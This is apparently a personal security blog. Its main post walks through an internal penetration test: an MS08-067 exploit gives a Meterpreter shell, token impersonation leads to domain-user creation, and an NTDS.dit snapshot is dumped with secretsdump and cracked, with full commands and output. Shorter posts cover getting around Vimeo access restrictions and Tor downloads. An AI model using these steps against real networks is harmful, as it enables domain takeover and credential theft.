Wednesday, October 29, 2014

Kali-nemesis-libnet

Installation of Nemesis on Kali Linux

Nemesis -> http://nemesis.sourceforge.net/

Dependencies
apt-get install libdnet-dev
apt-get install libpcap-dev

Libnet- > wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz

tar zxvf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a/
./configure 
make

To avoid an error we should edit Makefile
Complete the following path variable entry in Makefie otherwise there will be an error like
./install-sh include/libnet/libnet-macros.h /usr/include/libnet
./install-sh include/libnet/libnet-asn1.h /usr/include/libnet
./install-sh include/libnet/libnet-ospf.h /usr/include/libnet
./install-sh doc/libnet.3
install:    no destination specified
make: *** [install] Error 1

 
MAN_PREFIX  =   /usr/share/doc/


Then 
 
# make install















Friday, October 24, 2014

Enterprise-Security-A-Complete-Internal-Compromise

This post is about an Internal Vulnerability Assessment and Penetration Testing for an Enterprise. Every time I do similar project thought of creating a post for the same for my own reference... At last now is the time for the same....
Enterprise:-
Yes.. More than 1500 Users ...
More than 100 Servers...
Firewalls...
Routers ...
Proxy...
VOIP...
Bio...
IT...
I...

My favorite fingering printing command for a Windows Environment --
nmap -p445 --script=smb-os-discovery xxx.xxx.x.x/xx

Ran a Nessus for Desktop range of IP address - Surprisingly all of them are shown as good ! Except RDP MiTM, SSL and SMB signing. !

Continued the Nessus to Server Ranges at Head quarter's -- Same result ! !

Continued the Nessus to Servers at Branch offices ....

Except one 2003 Server - all others are shown Same !!!

There comes the God's last fingerprint - what is that Critical Red Color - Yes it is the very old largely exploited and demonstrated same peace of bug for evergreen  Microsoft - MS08-067!

No more explanation required here at all - Yes there comes the first reverse metapreter shell !

meterpreter > use incognito
Loading extension incognito...success.

meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
<DOMAIN_NAME REMOVED>\backupuser



meterpreter > impersonate_token DOMAIN\\backupuser
[-] No delegation token available
[+] Successfully impersonated user
DOMAIN\\backupuser
 meterpreter > getuid
Server username:
DOMAIN\\backupuser
meterpreter > execute -f cmd.exe -i -t
Process 3712 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
DOMAIN\\backupuser

There comes a user from the Domain. Next created a user on the Domain.

C:\WINDOWS\system32>net user pentest password-not-now /add /domain
net user pentest password-not-now /add /domain
The request will be processed at a domain controller for domain DOMAIN.

Luckily the backupuser user was having privilege to create a user on ADC and add him to the domain admins group, etc.

Connected to the Primary Domain Controller with RDP !!
At Command :-
C:\> ntdsutil
ntdsutil: snapshot
snapshot: activate instance NTDS
Active instance set to "NTDS".
snapshot: list all
No snapshots found.
snapshot: create
Creating snapshot...
Snapshot set {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} generated successfully.
snapshot: list all
1: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXxxxx
2: C:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
snapshot: mount 2
Snapshot {xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx} mounted as C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\

Downloaded the ntds.dt file from
C:\$SNAP_xxxxxxxxxxxxxxxxxxxxxx_VOLUMEC$\Windows\NTDS\

Created a a copy of System hive from Registry 
reg.exe save HKLM\SYSTEM c:\pentest.system
Downloaded the same file too..

Files downloaded from PDC
167M    ntds.dit
8.9M     pentest.system

Used secretsdump.py for extracting usernames and hashes 
#secretsdump.py -system pentest.system -ntds ntds.dit LOCAL

The resulted file was having more than 3000 lines !!!
crack station password list was able to get up to 50 passwords for half of the hashes and 20% of the users are using same password !
***Cracking the hashes are not allowed in all organizations- so make sure before cracking the passwords that this action is not denied by their policy**









Thursday, October 2, 2014

Vimeo-no-access-to-full-access

I came across a situation where I have a valid video link of vimeo but vimeo will not allow that to view online !

Rest explained below in pictures ..

First when I tried to access it on browser it did not worked !

Then I pasted the link in http://www.videograbber.net/free-vimeo-downloader

I was easily able to download the video :D


**Contents hidden due to privacy issues ...

How do I got the links ?

It was from a web site I just saved the source of the site and ran the following command from linux to get the vimeo links

#grep vimeo vimeo.txt  | awk -F"src=" '{print $2}' | awk -F "\" frame" '{print $1}' | awk -F "\"" '{print $2}'

Tuesday, September 30, 2014

Kali-Tor-Blocked-Content-download

Just a snap about blocked content [by Organization/ISP/Govt./Country/etc.] download on Kali using TOR network.


TOR
torsocks
Blocked Contents
Kali
Tails Linux